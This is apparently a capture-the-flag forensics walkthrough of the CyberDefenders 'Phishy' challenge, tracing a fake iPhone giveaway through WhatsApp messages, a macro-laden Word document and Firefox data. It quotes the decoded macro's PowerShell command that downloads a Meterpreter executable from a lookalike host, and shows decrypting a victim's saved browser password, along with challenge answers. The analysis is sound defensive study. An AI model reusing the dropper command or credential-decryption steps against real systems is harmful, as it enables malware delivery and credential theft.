
Information
Category Name: Phishy
Files: c43-GiveAway.zip 932 MB
–> Contains GiveAway.ad1 893MB
My Recommendations
This is my personal preference, I like being organized and deleting a folder when I’m done with it.
mkdir Documents/CyberDefenders/Giveaway && cd Documents/CyberDefenders/Giveaway
Download it from CyberDefenders and verify the file with sha1sum:
sha1sum /path/to/c43-GiveAway.zip
SHA1: 1c8885928168ca9f8ae27db7f98eef06d3c33817.
Then extract it with the provided password.
Run FTK Imager (installed under Wine) with:
wine '.wine/drive_c/Program Files/AccessData/FTK Imager/FTK Imager.exe'
Once it’s installed, select Add Evidence Item and select GiveAway.ad1. Then open the tree, right click on ‘[root]’, select “Export Files” and choose the working directory (WD) as the export destination.
Walkthrough
1. What is the hostname of the victim machine?
Using RegRipper:
rip.pl -r Windows/System32/config/SYSTEM -p compname
Answer: WIN-NF3JQEU4G0T
2. What is the messaging app installed on the victim machine?
A quick and easy way to find which apps may be installed and used is to list the AppData directory:
ls -la Users/*/AppData/*
The only messaging app is WhatsApp.
Answer: Whatsapp
3. The attacker tricked the victim into downloading a malicious document. Provide the full download URL.
In my experience, Microsoft Office documents are the most common malicious documents. Looking for a doc in the Users directory:
find Users/ -type f -name "*.doc"
Returns IPhone-Winners.doc in Semah’s Downloads directory. We can grep for the name of the doc (using the -i flag to ignore case):
grep -r -i 'IPhone-Winners' Users/Semah/
The only file matching is the WhatsApp msgstore database. Using strings and grep is a good way to get an idea of where the ‘iphone-winners’ string might be:
strings Users/Semah/AppData/Roaming/WhatsApp/Databases/msgstore.db | grep -i IPhone-Winners
Only one line matches, and it’s the download link. Usually it would be best practice to open the database to view its full contents, but since this is a specific question in a CTF and only one match was returned, we can leave it at that.
Answer: http[://]appIe[.]com/IPhone-Winners[.]doc
4. Multiple streams contain macros in the document. Provide the number of the highest stream.
First copy the file to the current directory, then run oledump:
cp Users/Semah/Downloads/IPhone-Winners.doc Iphone.doc
oledump.py Iphone.doc
The highest-numbered stream containing a macro is 10.
Answer: 10
5. The macro executed a program. Provide the program name?
Using Olevba:
olevba --deobf Iphone.doc
The only program being executed is powershell.
Answer: Powershell
6. The macro downloaded a malicious file. Provide the full download URL.
Using Olevba:
In the previous command’s output, before the powershell keyword, there is a Base64 encoded string. The --reveal option makes it easier to copy the string:
olevba --deobf --reveal Iphone.doc
echo -n 'base64encodedstring' | base64 -d
Returns:
invoke-webrequest -Uri ‘http[://]appIe[.]com/Iphone[.]exe’ -OutFile ‘C:\Temp\IPhone.exe’ -UseDefaultCredentials
Answer: http[://]appIe[.]com/Iphone[.]exe
7. Where was the malicious file downloaded to? (Provide the full path)
The decoded VBA string shows that the OutFile is C:\Temp\IPhone.exe. To make sure it was indeed downloaded there:
ls -la Temp
Answer: C:\Temp\IPhone.exe
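Beyond the single echo | base64 -d step above, this added Python example (not the writeup’s own code) scans an olevba dump for base64 tokens, decodes each as UTF-8 or as the UTF-16LE that powershell -EncodedCommand uses, and pulls out the -Uri and -OutFile values. The macro text, URL and path in it are constructed, not taken from the image.

```python
import base64
import re

# Base64-looking runs of 24+ characters; shorter runs are almost always VBA keywords.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URI_RE = re.compile(r"-Uri\s+['\"]?([^'\"\s]+)", re.IGNORECASE)
OUTFILE_RE = re.compile(r"-OutFile\s+['\"]?([^'\"\s]+)", re.IGNORECASE)


def decode_token(token):
    """Decode one base64 token to text, or None if it is not clean text.
    UTF-8 first (what `base64 -d` prints), then UTF-16LE, the encoding
    behind powershell -EncodedCommand."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:  # bad alphabet or padding: not base64 after all
        return None
    for encoding in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if text.isprintable():  # rejects NULs and other control characters
            return text
    return None


def extract_downloads(vba_text):
    """Scan an olevba text dump for base64 tokens and return the (uri, outfile)
    pairs found in every decoded PowerShell command."""
    found = []
    for token in B64_TOKEN.findall(vba_text):
        text = decode_token(token)
        if text is None:
            continue
        uri = URI_RE.search(text)
        out = OUTFILE_RE.search(text)
        if uri or out:
            found.append((uri.group(1) if uri else None, out.group(1) if out else None))
    return found


# Constructed sample: one download command embedded two ways, as UTF-8 base64
# (the form in this writeup) and as the UTF-16LE form used by -EncodedCommand.
SAMPLE_CMD = ("invoke-webrequest -Uri 'http://example.invalid/Iphone.exe' "
              "-OutFile 'C:\\Temp\\IPhone.exe' -UseDefaultCredentials")
SAMPLE_VBA = ("Sub AutoOpen()\n"
              '    Shell "powershell ' + base64.b64encode(SAMPLE_CMD.encode()).decode() + '", 0\n'
              '    Shell "powershell -EncodedCommand '
              + base64.b64encode(SAMPLE_CMD.encode("utf-16-le")).decode() + '", 0\n'
              "End Sub\n")
```

Run extract_downloads over the text olevba printed for the real document; each decoded command yields one (uri, outfile) pair.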
8. What is the name of the framework used to create the malware?
To find out more about the malware, we can check it on VirusTotal by uploading it or searching for its hash:
md5sum Temp/IPhone.exe
VirusTotal flags the file as a Trojan.Meterpreter, which means it was created with the Metasploit framework.
Answer: Metasploit
9. What is the attacker's IP address?
In VirusTotal, if you click on the Relations tab, you can see that the malware contacted two hosts:
192.168.0.30 is the router’s default IP, so the attacker’s IP is 155.94.69.27.
Answer: 155.94.69.27
10. The fake giveaway used a login page to collect user information. Provide the full URL of the login page?
In Question 2, we can see that Semah uses Firefox as a web browser, so if he entered his information, he must have clicked on the link. Phishing websites typically use PHP, so we can assume we are looking for a ‘login.php’ URL. This helps narrow our grep query:
grep -r -s -l 'login.php' Users/Semah/AppData/*/Mozilla/*
The two matches are the ‘places’ database and logins.json. The logins.json only contains one entry, which is for “appIe(dot)com/login.php”. This is a secured webpage, so we can check the places.sqlite-wal file:
strings Users/Semah/AppData/Roaming/Mozilla/Firefox/Profiles/pyb51x2n.default-release/places.sqlite-wal | grep -i login.php
The returned URL is unsecured, meaning it was most likely the fake login page.
Answer: http[://]appIe[.]competitions[.]com/login[.]php
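Instead of running strings over the WAL file, the Firefox history can be queried directly. This added Python example (not the author’s code) does that over moz_places, which also returns rows still held in places.sqlite-wal when that file is copied next to the database into a writable directory, and flags which matches are plain http. The schema subset and the rows are constructed.

```python
import sqlite3
from urllib.parse import urlparse

# Subset of Firefox's moz_places schema, enough for history URL queries.
MOZ_PLACES_DDL = """
CREATE TABLE moz_places (
    id INTEGER PRIMARY KEY,
    url LONGVARCHAR,
    title LONGVARCHAR,
    visit_count INTEGER DEFAULT -1,
    last_visit_date INTEGER
)"""


def find_login_pages(con, needle="login.php"):
    """Return (url, title, visit_count, is_https) for every history entry whose
    URL contains `needle`, oldest visit first.  Opening places.sqlite with
    sqlite3 also reads rows still sitting in places.sqlite-wal, as long as the
    -wal file is copied next to it into a writable directory."""
    rows = con.execute(
        "SELECT url, title, visit_count FROM moz_places "
        "WHERE url LIKE ? ORDER BY last_visit_date",
        ("%" + needle + "%",),
    ).fetchall()
    return [(url, title, visits, urlparse(url).scheme == "https")
            for url, title, visits in rows]


def build_sample_places():
    """Constructed in-memory stand-in for a profile's places.sqlite."""
    con = sqlite3.connect(":memory:")
    con.execute(MOZ_PLACES_DDL)
    con.executemany(
        "INSERT INTO moz_places (url, title, visit_count, last_visit_date) VALUES (?, ?, ?, ?)",
        [
            ("https://accounts.example.com/login.php", "Sign in", 5, 1609459200000000),
            ("https://example.com/", "Home", 3, 1609459300000000),
            # Plain-http lookalike: the kind of row the writeup's strings|grep surfaced.
            ("http://example-competitions.invalid/login.php", "Claim your prize", 1, 1609459400000000),
        ],
    )
    con.commit()
    return con


if __name__ == "__main__":
    # Against a real profile: con = sqlite3.connect("places.sqlite") after copying
    # places.sqlite and places.sqlite-wal out of the exported profile directory.
    for url, title, visits, https in find_login_pages(build_sample_places()):
        print(("https" if https else "HTTP ") + f"  {visits:>3} visits  {url}  ({title})")
```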
11. What is the password the user submitted to the login page?
The logins.json contains the credentials, but they are encrypted with a key stored in key4.db. You can follow this tutorial if you wish to proceed manually. I used firefox_decrypt to decrypt the credentials:
python3 firefox_decrypt.py ~/Documents/CyberDefenders/Giveaway/Users/Semah/AppData/Roaming/Mozilla/Firefox/Profiles/pyb51x2n.default-release
Answer: GacsriicUZMY4xiAF4yl
TLDR
– Phishy is a Windows Forensics challenge about a fake giveaway.
– It’s a combination of Maldoc and Windows Forensics.